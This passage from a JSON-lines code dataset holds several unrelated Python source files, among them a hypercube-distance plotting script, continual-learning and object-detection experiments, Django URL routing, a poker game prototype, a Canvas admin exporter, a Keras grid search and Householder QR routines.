scipy.spatial.distance as dm\nimport config as cfg\n\nplt.close()\n\ndef dimbox(ndim,nsamples):\n return np.random.rand(nsamples,ndim)\n \ndef calcfracdist(data,dist):\n num_points = data.shape[0]\n close_to_edge = np.logical_or(data > 1-dist,data < dist)\n within_range = np.any(close_to_edge,axis=1)\n num_in_range = np.count_nonzero(within_range)\n return num_in_range / num_points\n\ndef averagedistance(coordinates):\n nvalues = coordinates.shape[0]\n dist_between_points = dm.cdist(coordinates,coordinates)\n return np.mean(dist_between_points[np.triu_indices(nvalues,k=1)])\n \ndimensions = np.unique(np.round(np.logspace(0,3,50))).astype(int)\nndim = len(dimensions)\nnum_points = 1000\nfraction = np.zeros(ndim)\navg_distance = np.zeros(ndim)\n\ndistance = 0.01\nfor i,dim in enumerate(dimensions):\n print('Dim = {}'.format(dim))\n # Create the data\n data = dimbox(dim,num_points)\n # Calculate the fractional distance\n fraction[i] = calcfracdist(data,distance)\n # Calculate the average distance between points\n avg_distance[i] = averagedistance(data)\n\nplt.figure(figsize=(6,8))\nplt.subplot(2,1,1)\nplt.semilogx(dimensions,fraction,\n linewidth=2,\n color='#00B050')\nplt.xlabel('Number of Dimensions')\nplt.ylabel('Fraction of points distance < {} \\n from edge of hypercube'.format(distance))\nplt.grid('on')\n\nplt.subplot(2,1,2)\nplt.semilogx(dimensions,avg_distance,\n linewidth=2,\n color='#00B050')\nplt.xlabel('Number of Dimensions')\nplt.ylabel('Mean distance between points')\nplt.grid('on')\nplt.tight_layout()\nplt.savefig(cfg.dir_figures + 'lecture01e.png',dpi=300)","sub_path":"lecture01e.py","file_name":"lecture01e.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"284911871","text":"import avalanche as avl\nimport torch\nfrom torch.nn import CrossEntropyLoss\nfrom torch.optim import SGD\nfrom avalanche.evaluation import metrics as metrics\nfrom models import MLP\nfrom experiments.utils import set_seed, create_default_args\n\n\ndef generative_replay_smnist(override_args=None):\n \"\"\"\n \"Continual Learning with Deep Generative Replay\" by Shin et. al. 
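# --- editor's note: illustrative sketch, not part of the original dataset record ---
# Analytic cross-check for the plot above: for i.i.d. uniform points in the unit
# hypercube, E[(x_j - y_j)^2] = 1/6 per coordinate, so the RMS pairwise distance
# grows like sqrt(d/6); the empirical mean should track it to within a percent
# or so at large d:
import numpy as np
d = 100
pts = np.random.rand(200, d)
diff = pts[:, None, :] - pts[None, :, :]
dist = np.sqrt((diff ** 2).sum(-1))
iu = np.triu_indices(200, k=1)                 # off-diagonal pairs only
print(dist[iu].mean(), np.sqrt(d / 6))         # roughly 4.07 vs 4.08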
(2017).\n https://arxiv.org/abs/1705.08690\n \"\"\"\n args = create_default_args({'cuda': 0, 'hidden_size': 400,\n 'hidden_layers': 2, 'epochs': 10, 'dropout': 0,\n 'learning_rate': 0.001, 'train_mb_size': 16, 'seed': None}, override_args)\n set_seed(args.seed)\n device = torch.device(f\"cuda:{args.cuda}\"\n if torch.cuda.is_available() and\n args.cuda >= 0 else \"cpu\")\n\n benchmark = avl.benchmarks.SplitMNIST(5, return_task_id=False)\n model = MLP(hidden_size=args.hidden_size, hidden_layers=args.hidden_layers,\n drop_rate=args.dropout, relu_act=True)\n criterion = CrossEntropyLoss()\n\n interactive_logger = avl.logging.InteractiveLogger()\n\n evaluation_plugin = avl.training.plugins.EvaluationPlugin(\n metrics.accuracy_metrics(epoch=True, experience=True, stream=True),\n loggers=[interactive_logger])\n\n cl_strategy = avl.training.GenerativeReplay(\n model,\n torch.optim.Adam(model.parameters(), lr=args.learning_rate),\n criterion,\n train_mb_size=args.train_mb_size,\n train_epochs=args.epochs,\n eval_mb_size=128,\n replay_size=100,\n device=device,\n evaluator=evaluation_plugin,\n )\n\n res = None\n for experience in benchmark.train_stream:\n cl_strategy.train(experience)\n res = cl_strategy.eval(benchmark.test_stream)\n\n return res\n\n\nif __name__ == '__main__':\n res = generative_replay_smnist()\n print(res)\n","sub_path":"experiments/split_mnist/generative_replay.py","file_name":"generative_replay.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"220950837","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, print_function, unicode_literals\n\nfrom cms.sitemaps import CMSSitemap\nfrom django.conf import settings\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.contrib.sitemaps.views import sitemap as sitemap_view\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nfrom django.views.static import serve as serve_static\n\nfrom attendee.views import (\n AttendeeCancelView, AttendeeDeleteView, AttendeeProfileView,\n AttendeeRegistrationView, RegisterSuccessView,\n login_or_register_attendee_view)\nfrom devday.views import exception_test_view\nfrom talk.views import (\n InfoBeamerXMLView, RedirectVideoView, SpeakerListView, SpeakerProfileView,\n TalkDetails, TalkListPreviewView, TalkListView, TalkVideoView)\n\nadmin.autodiscover()\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n url(r'^sitemap\\.xml$', sitemap_view, {'sitemaps': {'cmspages': CMSSitemap}}),\n url(r'^select2/', include('django_select2.urls')),\n url(r'^attendee/register/$', AttendeeRegistrationView.as_view(), name='registration_register'),\n url(r'^attendee/cancel/(?P\\d+)$', AttendeeCancelView.as_view(), name='attendee_cancel'),\n url(r'^register/$', login_or_register_attendee_view, name='login_or_register_attendee'),\n url(r'^register/success/$', RegisterSuccessView.as_view(), name='register_success'),\n url(r'^accounts/', include('devday.registration_urls')),\n url(r'^accounts/delete/$', AttendeeDeleteView.as_view(), name='attendee_delete'),\n url(r'^accounts/profile/$', AttendeeProfileView.as_view(), name='user_profile'),\n url(r'^speakers/$', SpeakerListView.as_view(), name='speaker_list'),\n url(r'^schedule\\.xml$', InfoBeamerXMLView.as_view()),\n url(r'^(?P[^/]+)/schedule\\.xml$', InfoBeamerXMLView.as_view()),\n url(r'^videos/$', RedirectVideoView.as_view()),\n url(r'^speaker/profile/(?P\\d+)/$', 
SpeakerProfileView.as_view(), name='speaker_profile'),\n url(r'^upload/', include('django_file_form.urls')),\n url(r'^session/', include('talk.urls')),\n url(r'^committee/', include('talk.urls_committee')),\n url(r'^synthetic_server_error/$', exception_test_view),\n url(r'^(?P[^/]+)/talk-preview/$', TalkListPreviewView.as_view(), name='session_list_preview'),\n url(r'^(?P[^/]+)/talk/$', TalkListView.as_view(), name='session_list'),\n url(r'^(?P[^/]+)/videos/$', TalkVideoView.as_view(), name='video_list'),\n url(r'^(?P[^/]+)/talk/(?P[^/]+)/$', TalkDetails.as_view(), name='talk_details'),\n url(r'^', include('cms.urls')),\n url(r'^csvviews/', include('attendee.csv_urls')),\n]\n\n# This is only needed when using runserver.\nif settings.DEBUG: # pragma: nocover\n import debug_toolbar\n\n urlpatterns = [\n url(r'^__debug__/', include(debug_toolbar.urls)),\n url(r'^media/(?P.*)$', serve_static, # NOQA\n {'document_root': settings.MEDIA_ROOT, 'show_indexes': True}),\n ] + staticfiles_urlpatterns() + urlpatterns # NOQA\n","sub_path":"devday/devday/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"272044448","text":"from TeamPokerMainApp.Common.VariableDefinitions import *\nfrom TeamPokerMainApp.Player.PlayerProfile import PlayerProfile\nfrom TeamPokerMainApp.PokerGame.GameLogic.CardDeck import CardDeck\nfrom TeamPokerMainApp.PokerGame.GameLogic.Dealer import Dealer\nfrom TeamPokerMainApp.PokerGame.GameLogic.HandEvaluator import HandEvaluator\nimport numpy as np\n\n\nclass PokerGame:\n numberOfPlayers = 0\n maximumPlayers = 9\n\n def __init__(self):\n self._dealer = Dealer()\n self._deck = CardDeck()\n self._player0 = PlayerProfile()\n self._player1 = PlayerProfile()\n self._player2 = PlayerProfile()\n self._player3 = PlayerProfile()\n self._player4 = PlayerProfile()\n self._player5 = PlayerProfile()\n self._player6 = PlayerProfile()\n self._player7 = PlayerProfile()\n self._player8 = PlayerProfile()\n\n def addNewPlayer(self, name, money):\n if self.numberOfPlayers < 8:\n eval(f'self._player{self.numberOfPlayers}.createNewPlayer(name, money)')\n self.numberOfPlayers += 1\n else:\n print('Table is full!')\n\n def removePlayer(self, playerNumber):\n self.numberOfPlayers -= 1\n eval(f'self._player{playerNumber}.clearPlayer()')\n\n def newPokerRound(self):\n self._dealer.clearCardsOnTheTableAndPot()\n self.deck = self._deck.get_shuffled_deck()\n self._deck.print_shuffled_deck(self.deck)\n # start giving cards to players\n for card in range(NUMBER_OF_CARDS_IN_HAND):\n for player in range(self.maximumPlayers):\n if eval(f'self._player{player}.getPlayingStatus()') is STATUS_PLAYING:\n eval(f'self._player{player}.setCardsInPlayerHand(card, self.get_top_card())')\n\n def card_round_flop(self):\n self.get_top_card() # just removes top card from the deck, to burn it\n for card in range(NUMBER_OF_CARDS_ON_FLOP):\n self._dealer.setCardsOnTheTable(card, self.get_top_card())\n\n def card_round_turn(self):\n self.get_top_card() # just removes top card from the deck, to burn it\n self._dealer.setCardsOnTheTable(CARD_INDEX_TURN, self.get_top_card())\n\n def card_round_river(self):\n self.get_top_card() # just removes top card from the deck, to burn it\n self._dealer.setCardsOnTheTable(CARD_INDEX_RIVER, self.get_top_card())\n\n def get_top_card(self):\n topCard = self.deck[CARD_INDEX_TOP_CARD]\n self.deck = np.delete(self.deck, CARD_INDEX_TOP_CARD)\n return topCard\n\n def 
printPlayerHands(self):\n for player in range(self.numberOfPlayers):\n printingString = eval(f'self._player{player}.name')\n for item in eval(f'self._player{player}.getCardsInPlayerHand()'):\n printingString += ' '\n printingString += self._deck.get_card_name_from_card_number(item)\n\n print(printingString)\n\n def printTableCards(self):\n prnt = ''\n for card in self._dealer.getCardsOnTheTable():\n if card is not NO_CARD:\n prnt += ' '\n prnt += self._deck.get_card_name_from_card_number(card)\n print(prnt)\n\n def takePlayerCardsPlusTableCards(self, playerID):\n sevenCards = []\n for card in eval(f'self._player{playerID}.getCardsInPlayerHand()'):\n sevenCards.append(self._deck.get_card_number_from_card_id(card))\n for card in self._dealer.getCardsOnTheTable():\n sevenCards.append(self._deck.get_card_number_from_card_id(card))\n return sevenCards\n\n def evaluatePlayersHands(self):\n print(\"\\nResults:\")\n for player in range(self.numberOfPlayers):\n playerName = eval(f'self._player{player}.name')\n sevenCards = self.takePlayerCardsPlusTableCards(player)\n handEvaluator = HandEvaluator(sevenCards, playerName)\n result = handEvaluator.evaluate_hand()\n print(result)\n\n\ngame = PokerGame()\ngame.addNewPlayer('Victor', 10.0)\ngame.addNewPlayer('Cornel', 10.0)\ngame.addNewPlayer('Csaba', 10.0)\ngame.addNewPlayer('Adi', 10.0)\ngame.addNewPlayer('Andrei', 10.0)\n\ngame.newPokerRound()\nprint('----')\ngame.printPlayerHands()\nprint('----')\nprint('Flop: ')\ngame.card_round_flop()\ngame.printTableCards()\nprint('Turn: ')\ngame.card_round_turn()\ngame.printTableCards()\nprint('River: ')\ngame.card_round_river()\ngame.printTableCards()\ngame.evaluatePlayersHands()\n","sub_path":"~examples_and_tests/first_test.py","file_name":"first_test.py","file_ext":"py","file_size_in_byte":4436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"156913677","text":"from canvasapi import Canvas\nimport config\nimport csv\n\ncanvas = Canvas(config.API_URL, config.API_KEY)\n\naccountIDs = [6,7,8,9,10,11,12,13,14,15,16,17,18]\n\nfilename = \"DOE_Admin.csv\"\n\ncsv = open(filename, \"w\")\ncsv.write(\"username,role,role_id,subaccount\\n\")\n\ndef build_admin_lst(account, mode):\n\n print(\"\\n_______________________\\n\" + \"Admin's for: \" + str(account))\n root_admins = account.get_admins()\n print(\"*****Root Admins*****\\n\")\n\n for admin in root_admins: # Grabs all root level Admin Users\n user = admin.user\n role = admin.role\n print(\"Name: \" + user['login_id'] + \" -> Role: \" + role)\n\n csv.write(str(user['login_id'])+\",\"+role+\",\"+str(admin.id)+\",\"+str(account)+\"\\n\")\n\n\n if mode == \"all\":\n subaccounts = account.get_subaccounts(True) # Get all subaccounts in an account\n for subaccount in subaccounts:\n #print(\" \" + str(subaccount))\n admins = subaccount.get_admins() # Get all Admin Users\n tmp = []\n for admin in admins:\n user = admin.user\n role = admin.role\n # print(\" Name: \" + user['name'] + \" -> Role: \" + role)\n\n else:\n return None\n\n\nfor ID in accountIDs:\n current_account = canvas.get_account(ID)\n\n build_admin_lst(current_account, \"root\") # Account, Mode(\"root\" or \"all\")\n\nprint(\"Your .CSV is done...\")","sub_path":"get_admins.py","file_name":"get_admins.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"306415465","text":"import sys\nfrom pathlib import Path\nfrom utils_chess import *\nfrom datasets import 
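# --- editor's note: illustrative sketch, not part of the original dataset record ---
# The PokerGame class above reaches its players through eval(f'self._player{n}...'),
# which is fragile and hard to debug. Keeping the profiles in a list gives the
# same indexed access without eval (PlayerProfile as imported in the record):
class PokerGameSketch:
    MAX_PLAYERS = 9

    def __init__(self):
        self._players = [PlayerProfile() for _ in range(self.MAX_PLAYERS)]
        self.number_of_players = 0

    def add_new_player(self, name, money):
        if self.number_of_players < self.MAX_PLAYERS:
            self._players[self.number_of_players].createNewPlayer(name, money)
            self.number_of_players += 1
        else:
            print('Table is full!')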
PascalVOCDataset, ChessDataset\nfrom tqdm import tqdm\nfrom pprint import PrettyPrinter\nfrom argparser import parse_val_arguments\n\n# Good formatting when printing the APs for each class and mAP\npp = PrettyPrinter()\n\n# Parameters\nkeep_difficult = True # difficult ground truth objects must always be considered in mAP calculation, because these objects DO exist!\nworkers = 4\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\ndef evaluate(checkpoint, run_colab, batch_size, set, subset):\n \"\"\"\n Evaluate.\n\n :param test_loader: DataLoader for test data\n :param model: model\n \"\"\"\n if run_colab:\n root_path = Path(\"/content/gdrive/My Drive/Chess notation/annotated\")\n else:\n root_path = \"/Users/laurenssamson/Documents/Projects/Chess_notation/chess/data/chess_data\"\n test_dataset = ChessDataset(root_path)\n if subset > 0:\n test_dataset.images = test_dataset.images[:subset]\n test_dataset.objects = test_dataset.objects[:subset]\n test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False,\n collate_fn=test_dataset.collate_fn, num_workers=workers, pin_memory=True)\n # Load model checkpoint that is to be evaluated\n checkpoint = torch.load(checkpoint, map_location=device)\n model = checkpoint['model']\n print(f\"Number of epoch trained: {checkpoint['epoch']}\")\n model = model.to(device)\n\n # Switch to eval mode\n model.eval()\n # Make sure it's in eval mode\n model.eval()\n\n # Lists to store detected and true boxes, labels, scores\n det_boxes = list()\n det_labels = list()\n det_scores = list()\n true_boxes = list()\n true_labels = list()\n true_difficulties = list() # it is necessary to know which objects are 'difficult', see 'calculate_mAP' in utils.py\n\n with torch.no_grad():\n # Batches\n for i, (images, boxes, labels, difficulties) in enumerate(tqdm(test_loader, desc='Evaluating')):\n images = images.to(device) # (N, 3, 300, 300)\n\n # Forward prop.\n predicted_locs, predicted_scores = model(images)\n\n # Detect objects in SSD output\n det_boxes_batch, det_labels_batch, det_scores_batch = model.detect_objects(predicted_locs, predicted_scores,\n min_score=0.01, max_overlap=0.45,\n top_k=200)\n # Evaluation MUST be at min_score=0.01, max_overlap=0.45, top_k=200 for fair comparision with the paper's results and other repos\n\n # Store this batch's results for mAP calculation\n boxes = [b.cpu() for b in boxes]\n labels = [l.cpu()for l in labels]\n difficulties = [d.cpu() for d in difficulties]\n\n det_boxes.extend([box.cpu() for box in det_boxes_batch])\n det_labels.extend([label.cpu() for label in det_labels_batch])\n det_scores.extend([score.cpu() for score in det_scores_batch])\n true_boxes.extend(boxes)\n true_labels.extend(labels)\n true_difficulties.extend(difficulties)\n\n # Calculate mAP\n APs, mAP = calculate_mAP(det_boxes, det_labels, det_scores, true_boxes, true_labels, true_difficulties)\n\n # Print AP for each class\n pp.pprint(APs)\n\n print('\\nMean Average Precision (mAP): %.3f' % mAP)\n model.train()\n\nif __name__ == '__main__':\n args = parse_val_arguments(sys.argv[1:])\n evaluate(**args)\n\n","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"347146932","text":"import pandas as pd\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom matplotlib import pyplot as plt\nimport time\nimport os\nimport numpy as np\nimport sys\n\ntime1 = time.time()\n#Daten 
einlesen (read in the data)\nlocation = input(\"Which machine is this running on?\")\nroot_path = \"//\"\nif location == \"Taurus\" or location == \"taurus\":\n    root_path = \"/home/s1388135/Bachelor-Thesis/\"\nsys.path.insert(0, root_path)\nimport ml\n\n\n\n#Build the grid: one pool per hyperparameter, so the dimensions the grid spans can be chosen dynamically\n# important: the default model has index 0 in every pool\npools = dict()\npools[\"batch_size\"] = [256, 512, 768, 1024, 128]\npools[\"units_nr_layers\"] = [(256,5), (512,3), (64,7), (1024, 2), (128, 6)]\npools[\"learning_rate\"]= [1e-2, 1e-3, 1e-4, 5e-3]\npools[\"l2_kernel\"] = [0.0]\npools[\"l2_bias\"] = [0.0]\npools[\"loss_fn\"] = [keras.losses.MeanAbsoluteError(), keras.losses.MeanSquaredError(), keras.losses.Huber()]\npools[\"optimizer\"] = [keras.optimizers.Adam, keras.optimizers.RMSprop]\npools[\"momentum\"] = [0.1]\npools[\"dropout\"] = [False]\npools[\"dropout_rate\"] = [0]\npools[\"kernel_initializer\"] = [tf.keras.initializers.HeNormal()]\npools[\"bias_initializer\"] = [tf.keras.initializers.Zeros()]\npools[\"hidden_activation\"] = [tf.nn.leaky_relu, tf.nn.relu, tf.nn.elu, tf.nn.sigmoid, tf.nn.tanh]\npools[\"output_activation\"] = [ml.LinearActiavtion()]\npools[\"feature_normalization\"] = [\"normalization\", None]\npools[\"scaling_bool\"] = [True]\npools[\"logarithm\"] = [True]\npools[\"base10\"] = [True, False]\npools[\"label_normalization\"] = [True, False]\npools[\"min_delta\"] = [5e-6]\npools[\"min_lr\"] = [5e-8]\npools[\"dataset\"] =[ \"TrainingData4M\"]\n#Choose which hyperparameters should appear in the model name:\nnames = {\"loss_fn\", \"units_nr_layers\", \"optimizer\", \"hidden_activation\", \"dataset\", \"batch_size\",\n         \"learning_rate\", \"units_nr_layers\", \"label_normalization\", \"base10\", \"feature_normalization\", }\n\nvary_multiple_parameters = True\n\n#Variables...\ntrain_frac = 0.95\ntraining_epochs = 100\nsize = 100\nlr_reduction=0.05\nlr_factor = 0.5\nnesterov = True\nloss_function = keras.losses.MeanAbsolutePercentageError()\nfeature_rescaling = False\n\ncustom = False\nnew_model=True\n\nlr_patience = 1\nstopping_patience = 3\nrepeat = 2\n\n\n\n#Set of configurations that have already been checked\nchecked_configs = ml.create_param_configs(pools=pools, size=size, vary_multiple_parameters=vary_multiple_parameters)\nresults_list = dict()\n\nfor config in checked_configs:\n    #Nicer accessibility\n    params = dict()\n    for i,param in enumerate(pools):\n        params[param] = config[i]\n\n    data_path = root_path + \"/Files/Hadronic/Data/\" + params[\"dataset\"] + \"/\"\n    data_name = \"all\"\n    project_path = root_path + \"Files/Hadronic/Models/LastRandomSearch/\"\n    if not vary_multiple_parameters:\n        project_path += str(config[-1]) + \"/\"\n    loss_name = \"best_loss\"\n    project_name = \"\"\n\n    label_name = \"WQ\"\n\n    if params[\"feature_normalization\"] == \"rescaling\":\n        feature_rescaling = True\n    elif params[\"feature_normalization\"] == \"normalization\":\n        feature_normalization = True\n\n    #Adjust the training parameters slightly to the batch size\n    training_epochs = int(1/100 * params[\"batch_size\"]) + 90\n    lr_reduction = 25/params[\"batch_size\"]\n\n    #Initialize the callbacks and min delta\n    reduce_lr = keras.callbacks.LearningRateScheduler(ml.class_scheduler(reduction=lr_reduction, min_lr=params[\"min_lr\"]))\n    reduce_lr_on_plateau = keras.callbacks.ReduceLROnPlateau(monitor=\"loss\", factor=lr_factor, patience=lr_patience, min_delta=params[\"min_delta\"], min_lr=params[\"min_lr\"])\n    early_stopping = keras.callbacks.EarlyStopping(monitor=\"loss\", min_delta=1e-1 * params[\"min_delta\"], patience=stopping_patience)\n    callbacks = [reduce_lr_on_plateau, early_stopping, reduce_lr]\n\n    # Read in the data:\n    (training_data, train_features, train_labels, test_features, test_labels, transformer) = ml.data_handling(\n        data_path=data_path + data_name, label_name=label_name, scaling_bool=params[\"scaling_bool\"], logarithm=pools[\"logarithm\"], base10=params[\"base10\"],\n        label_normalization=params[\"label_normalization\"], feature_rescaling=feature_rescaling,\n        train_frac=train_frac)\n\n\n    #Create path to save model\n    if not vary_multiple_parameters:\n        names = {config[-1]}\n    model_name = ml.construct_name(params, names_set=names)\n    save_path = project_path + model_name\n    print(\"Initializing model \", model_name)\n\n    #Read in the best loss so far\n    best_losses = None\n    if os.path.exists(project_path + project_name + loss_name):\n        best_losses = pd.read_csv(project_path + project_name + loss_name)\n\n    # Create the directory\n    if not os.path.exists(path=save_path):\n        os.makedirs(save_path)\n\n\n    #initialize twice to reduce statistical fluctuations;\n    #average training_time and total loss over the initializations\n    training_time = 0\n    total_losses = []\n    models = []\n    for i in range(repeat):\n        #Initialize the model\n        models.append(ml.initialize_model(nr_layers=params[\"units_nr_layers\"][1], units=params[\"units_nr_layers\"][0], loss_fn=params[\"loss_fn\"], optimizer=params[\"optimizer\"],\n                                          hidden_activation=params[\"hidden_activation\"], output_activation=params[\"output_activation\"],\n                                          kernel_initializer=params[\"kernel_initializer\"], bias_initializer=params[\"bias_initializer\"], l2_kernel=params[\"l2_kernel\"],\n                                          learning_rate=params[\"learning_rate\"], momentum=params[\"momentum\"], nesterov=nesterov,\n                                          l2_bias=params[\"l2_bias\"], dropout=params[\"dropout\"], dropout_rate=params[\"dropout_rate\"],\n                                          new_model=new_model, custom=custom, feature_normalization=pools[\"feature_normalization\"]))\n    for i,model in enumerate(models):\n        # Start the training\n        time4 = time.time()\n        history = model.fit(x=train_features, y=train_labels, batch_size=params[\"batch_size\"], epochs=training_epochs,\n                            callbacks = callbacks, verbose=2, shuffle=True)\n        time5 = time.time()\n        training_time += time5 - time4\n\n        # Plot the losses\n        ml.make_losses_plot(history=history)\n        plt.savefig(save_path + \"/training_losses\")\n        plt.show()\n\n        # Check how good it was\n        results = model(test_features)\n        loss = float(loss_function(y_pred=transformer.retransform(results), y_true=transformer.retransform(test_labels)))\n        print(\"Loss of run number \", i, \" : \", loss)\n        total_losses.append(loss)\n\n    #average training_time and total loss:\n    avg_total_loss = np.mean(total_losses)\n    smallest_loss = np.min(total_losses)\n    loss_error = np.std(total_losses)\n    training_time = 1 / repeat * training_time\n    print(\"Losses of the specific cycle:\", total_losses)\n    print(\"average Loss over \", repeat, \"cycles:\", np.mean(total_losses))\n    print(\"The best model (model no.\", np.argmin(total_losses), \") will be saved\")\n    # Save the model and the config\n    model = models[np.argmin(total_losses)]\n    model.save(filepath=save_path, save_format=\"tf\")\n    (config, index) = ml.save_config(new_model=new_model, save_path=save_path, model=model, learning_rate=params[\"learning_rate\"],\n                                     training_epochs=training_epochs, batch_size=params[\"batch_size\"],\n                                     avg_total_Loss=avg_total_loss, smallest_loss=smallest_loss, loss_error=loss_error, total_losses=total_losses,\n                                     transformer=transformer, training_time=training_time,\n                                     custom=custom, loss_fn=params[\"loss_fn\"], feature_handling=params[\"feature_normalization\"],\n                                     min_delta = params[\"min_delta\"], nr_hidden_layers=params[\"units_nr_layers\"][1], units=params[\"units_nr_layers\"][0])\n\n\n    #Check whether progress was made\n    ml.check_progress(model=models[np.argmin(total_losses)], transformer=transformer, test_features=test_features, test_labels=test_labels,\n                      best_losses=best_losses, project_path=project_path, project_name=project_name,\n                      index=index, config=config, loss_name=loss_name)\n\n    #Record the result in the dict\n    results_list[model_name] = \"{:.2f}\".format(float(avg_total_loss))\n\n    #Save the results\n    results_list_pd = pd.DataFrame(\n        results_list,\n        index = [0]\n    )\n    results_list_pd = results_list_pd.transpose()\n    results_list_pd.to_csv(project_path + \"results\")\n\n\n\n","sub_path":"Executables/Hadronic Process/ML/GridSearch.py","file_name":"GridSearch.py","file_ext":"py","file_size_in_byte":8711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"463306487","text":"n = int(input(\"enter n:\"))\ndig = []\n\nwhile n != 0:\n    dig.append(n % 10)\n    n = n // 10\n\nprime = False\n\nfor num in dig:\n    # reset the test for every digit: 0 and 1 are not prime, and 2 must not\n    # inherit the verdict of an earlier digit (in the original, the trial\n    # division loop never runs for num == 2, so a lone digit 2 was missed)\n    is_prime = num >= 2\n    i = 2\n    while i < num:\n        if num % i == 0:\n            is_prime = False\n            break\n        i += 1\n    if is_prime:\n        prime = True\n        break\n\nif prime:\n    print(\"At least one prime digit found\")\nelse:\n    print(\"No prime digits found\")\n","sub_path":"week-2/3-Simple-Algorithms/prime_digit.py","file_name":"prime_digit.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"253807765","text":"import numpy as np\nfrom scipy.linalg import solve_triangular\n\ndef householder(A, kmax=None):\n    \"\"\"\n    Given a real mxn matrix A, find the reduction to upper triangular matrix R\n    using Householder transformations.\n\n    :param A: an mxn-dimensional numpy array\n    :param kmax: an integer, the number of columns of A to reduce \\\n    to upper triangular. 
If not present, will default to n.\n\n :return R: an mxn-dimensional numpy array containing the upper \\\n triangular matrix\n \"\"\"\n\n m, n = A.shape\n R = (1.0+0j)*A\n if kmax is None:\n kmax = n\n kmax = min(m,kmax)\n for k in range(kmax):\n x = 1.0 * R[k:,k]\n v = (1.0+0j) * x\n arg = np.angle(x[0])\n coeff = np.exp(1j * arg)\n v[0] += coeff * np.linalg.norm(x)\n v = v / np.linalg.norm(v)\n R[k:,k:] -= 2 * np.outer(v, np.dot(v.conj().transpose(), R[k:,k:]))\n return R\n\n\ndef householder_solve(A, b):\n \"\"\"\n Given a real mxm matrix A, use the Householder transformation to solve\n Ax_i=b_i, i=1,2,...,k.\n\n :param A: an mxm-dimensional numpy array\n :param b: an mxk-dimensional numpy array whose columns are the \\\n right-hand side vectors b_1,b_2,...,b_k.\n\n :return x: an mxk-dimensional numpy array whose columns are the \\\n right-hand side vectors x_1,x_2,...,x_k.\n \"\"\"\n m, k = b.shape\n Ahat = np.zeros((m,m+1))\n x = np.zeros((m,k))\n for i in range(k):\n Ahat[:,:m] = 1.0*A\n Ahat[:,m] = 1.0*b[:,i]\n Rhat = householder(Ahat, m)\n x[:,i] = solve_triangular(Rhat[:,:m], Rhat[:,m])\n return x\n\n\ndef householder_qr(A):\n \"\"\"\n Given a real mxn matrix A, use the Householder transformation to find\n the QR factorisation of A.\n\n :param A: an mxn-dimensional numpy array\n\n :return Q: an mxm-dimensional numpy array\n :return R: an mxn-dimensional numpy array\n \"\"\"\n m, n = A.shape\n I = np.eye(m, dtype = complex)\n Ahat = np.zeros((m, n+m), dtype = complex)\n Ahat[:, :n] = A\n Ahat[:, n:] = I\n\n Rhat = householder(Ahat)\n R = Rhat[:,:n]\n Q = Rhat[:,n:].transpose().conj()\n\n return Q, R\n\n\ndef householder_ls(A, b):\n \"\"\"\n Given a real mxn matrix A and an m dimensional vector b, find the\n least squares solution to Ax = b.\n\n :param A: an mxn-dimensional numpy array\n :param b: an m-dimensional numpy array\n\n :return x: an n-dimensional numpy array\n \"\"\"\n m, n = A.shape\n Ahat = np.zeros((m, n+1))\n Ahat[:,:n] = 1.0*A\n Ahat[:, n] = 1.0*b\n\n Rhat = householder(Ahat)\n x = solve_triangular(Rhat[:n,:n], Rhat[:n,n])\n\n return x\n","sub_path":"exercises3.py","file_name":"exercises3.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"305557689","text":"\"\"\"mysite URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
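# --- editor's note: illustrative usage sketch, not part of the original dataset record ---
# Quick numerical check of householder_qr above (assumes it is importable from
# the exercises3 module): Q should be unitary, R upper triangular, and Q @ R
# should reproduce A to machine precision.
import numpy as np
A = np.random.randn(6, 4)
Q, R = householder_qr(A)
print(np.allclose(Q @ R, A))                   # True
print(np.allclose(Q.conj().T @ Q, np.eye(6)))  # True
print(np.allclose(np.tril(R, k=-1), 0))        # True: R is upper triangular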
